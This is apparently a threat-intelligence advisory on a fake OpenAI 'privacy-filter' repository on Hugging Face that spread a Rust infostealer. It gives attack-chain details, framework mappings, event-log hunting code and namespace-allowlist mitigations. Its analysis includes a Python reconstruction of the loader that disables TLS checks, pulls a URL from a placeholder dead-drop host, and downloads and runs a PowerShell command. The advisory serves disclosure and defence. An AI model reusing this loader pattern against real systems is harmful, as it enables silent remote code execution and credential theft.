
Typosquatted OpenAI Repo on Hugging Face Delivered Rust Infostealer to 244K Users

TL;DR CRITICAL
  • What happened: Fake OpenAI model repo on Hugging Face delivered a Rust infostealer to 244,000 downloaders.
  • Who's at risk: AI/ML practitioners and developers who downloaded or executed the typosquatted Open-OSS/privacy-filter repository; anyone who ran it on a Windows machine is directly exposed.
  • Act now: Audit any usage of Open-OSS/privacy-filter and treat affected systems as fully compromised · Verify Hugging Face repository provenance by checking namespace and commit history before execution · Rotate browser credentials, cryptocurrency wallet keys, and Discord tokens on any affected machine

Overview

A threat actor successfully typosquatted OpenAI’s legitimate openai/privacy-filter model on Hugging Face, publishing a near-identical repository under the namespace Open-OSS/privacy-filter. The malicious project copied the official model card verbatim, rode the legitimate product’s launch momentum, and reached the platform’s trending list — accumulating 244,000 downloads before Hugging Face disabled access. Privacy Filter is an OpenAI open-weight model released in April 2026 to detect and redact PII from unstructured text, making it a high-value impersonation target for developers integrating privacy tooling into production pipelines.

Technical Analysis

The attack chain is multi-stage and deliberately obfuscated:

  1. Initial Execution: Users are instructed to clone the repository and run start.bat (Windows) or loader.py (Linux/macOS). On Windows, the loader disables SSL verification, decodes a Base64-encoded URL stored on JSON Keeper (a public JSON paste service used as a dead-drop resolver), and retrieves a PowerShell command.

  2. Dead-Drop Resolver: Using JSON Keeper decouples the payload URL from the repository, allowing operators to hot-swap malware without touching the repo — evading static repository scanning (a defanged sketch of this pattern follows the analysis below).

  3. Second-Stage Downloader: PowerShell downloads a batch script from api.eth-fastscan[.]org, which:

    • Elevates privileges via a UAC prompt
    • Configures Microsoft Defender exclusions
    • Downloads the next-stage binary from the same domain
    • Establishes a scheduled task that launches the binary via PowerShell as SYSTEM
  4. Infostealer Payload (Rust-based):

    • Captures screenshots
    • Harvests credentials from Chromium and Gecko browsers
    • Exfiltrates Discord tokens, cryptocurrency wallet data and extensions, FileZilla configs, and wallet seed phrases
    • Checks for debuggers, sandboxes, and virtual machines
    • Disables AMSI and ETW to evade behavioural detection
    • Operates as a one-shot SYSTEM-context launcher; the scheduled task self-destructs before reboot, leaving no persistence artefact

The ephemeral persistence model suggests the operators prioritise stealth and rapid exfiltration over long-term access.
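
A defanged reconstruction helps defenders recognise the pattern. The Python sketch below is illustrative, not the actual loader: the dead-drop URL and the JSON field name are placeholders, and only the flow of steps 1 and 2 above is reproduced.

```python
# Defanged reconstruction of the loader pattern from steps 1-2.
# The dead-drop URL and the "url" field name are placeholders, not IoCs.
import base64
import json
import ssl
import subprocess
import urllib.request

DEAD_DROP = "https://jsonkeeper.example/b/REDACTED"  # placeholder dead drop

# The real loader reportedly disables SSL verification, so any TLS
# endpoint can front the dead drop without a valid certificate.
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE

# Stage 1: fetch the paste and Base64-decode the payload URL it holds.
# Keeping the URL in the paste, not the repo, defeats static repo scans.
with urllib.request.urlopen(DEAD_DROP, context=ctx) as resp:
    payload_url = base64.b64decode(json.load(resp)["url"]).decode()

# Stage 2: retrieve the PowerShell command and hand it to the shell.
with urllib.request.urlopen(payload_url, context=ctx) as resp:
    ps_command = resp.read().decode()
subprocess.run(["powershell", "-NoProfile", "-Command", ps_command])
```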

Framework Mapping

  • AML.T0010 – ML Supply Chain Compromise: The attack directly targets the ML model distribution pipeline via a trojanised repository on a major model-sharing platform.
  • AML.T0019 – Publish Poisoned Datasets/Models: The repository mimics a legitimate model release to introduce malicious code into the consumer’s environment.
  • LLM05 – Supply Chain Vulnerabilities: Hugging Face serves as the distribution vector; the attack exploits weak namespace governance and trending mechanics to amplify reach.

Impact Assessment

With 244,000 downloads, the potential victim pool is large and skewed toward security-conscious developers — precisely those who would adopt a PII-filtering tool. Compromised assets include browser-stored credentials, cryptocurrency holdings, and Discord accounts. The SYSTEM-level execution context means any machine that ran the payload should be considered fully compromised. The self-deleting task complicates forensic investigation, as traditional persistence indicators will be absent.
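
The self-deleting task still leaves event-log residue even when no live persistence remains. A minimal hunting sketch in Python, shelling out to the built-in wevtutil utility: Security event 4698 (scheduled task created) survives the task's deletion, though it requires object-access auditing to be enabled, and Defender's Operational log records configuration changes, including exclusion additions, as event 5007. The result counts and query scope below are illustrative.

```python
# Hunt for residue of the self-deleting scheduled task and the Defender
# exclusion changes described above. Run on the suspect Windows host.
import subprocess

QUERIES = [
    # 4698: scheduled task created. The creation event survives in the
    # Security log after the task deletes itself (requires object-access
    # auditing to be enabled).
    ("Security", "*[System[(EventID=4698)]]"),
    # 5007: Defender configuration changed, which includes new exclusions.
    ("Microsoft-Windows-Windows Defender/Operational",
     "*[System[(EventID=5007)]]"),
]

for log, xpath in QUERIES:
    result = subprocess.run(
        ["wevtutil", "qe", log, f"/q:{xpath}", "/f:text", "/c:50", "/rd:true"],
        capture_output=True, text=True,
    )
    print(f"=== {log} ===")
    print(result.stdout or "(no matching events)")
```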

Mitigation & Recommendations

  • Immediate: Treat any system that executed Open-OSS/privacy-filter artefacts as compromised. Isolate, image, and rebuild.
  • Credential Rotation: Rotate all browser-stored passwords, cryptocurrency wallet keys, and Discord tokens from affected machines.
  • Repository Vetting: Before cloning any Hugging Face repository, verify the exact namespace matches the official vendor account. Check model card edit history for anomalies.
  • Execution Policy: Never run batch or Python setup scripts from model repositories without code review, particularly those requesting elevated privileges.
  • Platform Controls: Organisations should implement allowlists for approved Hugging Face namespaces in CI/CD pipelines (as sketched below) and restrict unapproved model downloads in developer environments.
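
In practice, the namespace allowlist can be enforced as a thin wrapper around the huggingface_hub client that rejects any repository whose namespace is not an approved vendor account. A minimal sketch; the allowlist contents and the safe_snapshot_download wrapper are illustrative, not a standard API.

```python
# Thin guard around huggingface_hub: refuse downloads from namespaces
# that are not explicitly approved. Allowlist contents are illustrative.
from huggingface_hub import snapshot_download

APPROVED_NAMESPACES = {"openai", "meta-llama", "mistralai"}  # example allowlist

def safe_snapshot_download(repo_id: str, **kwargs) -> str:
    """Download a model snapshot only if its namespace is approved."""
    namespace, _, name = repo_id.partition("/")
    if not name or namespace not in APPROVED_NAMESPACES:
        raise PermissionError(
            f"Namespace {namespace!r} is not on the approved list; "
            f"refusing to download {repo_id!r}."
        )
    return snapshot_download(repo_id=repo_id, **kwargs)

# "Open-OSS/privacy-filter" is rejected by the namespace check, while
# the legitimate "openai/privacy-filter" passes.
path = safe_snapshot_download("openai/privacy-filter")
```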
